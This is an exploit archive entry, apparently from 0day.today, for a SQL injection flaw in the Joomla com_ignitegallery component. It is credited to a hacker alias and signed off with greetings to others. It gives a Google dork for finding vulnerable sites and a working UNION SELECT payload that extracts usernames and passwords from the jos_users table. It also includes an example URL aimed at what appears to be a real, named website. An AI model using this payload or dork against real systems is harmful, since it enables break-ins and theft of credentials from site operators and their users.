Joomla Component com_ignitegallery SQL injection vulnerability

2011-03-28T00:00:00
ID 1337DAY-ID-15704
Type zdt
Reporter TiGEr
Modified 2011-03-28T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Joomla Component com_ignitegallery SQL injection vulnerability‎
###################################################
[+] Author        :  TiGeR_YeMeN HaCkEr
[+] Author Name   :  TiGEr...
[+] Email         :  [email protected]
[+] Greetz :  Sa-HaCkEr
[+] Group   :  No-Group
[+] Vulnerability :  SQL injection
[+] Google Dork   :  index.php?option=com_ignitegallery ;)
 
####################################################

DorK  :  index.php?option=com_ignitegallery

Exploit

index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users--

Example

http://www.vaalweekblad.com/index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat%28username,char%2858%29,password%29KHG,4,5,6,7,8,9,10+from+jos_users--

##################################################################

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Love: Fa8D HaCkEr, alsha67, Mr.3shoo8, sam san3a, Dmar SkooD,Mr.Dangers , Back Track , Slayr
, Problem hacker , smt hacker , king511

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Home  : www.sa-hacker.com 



#  0day.today [2018-03-02]  #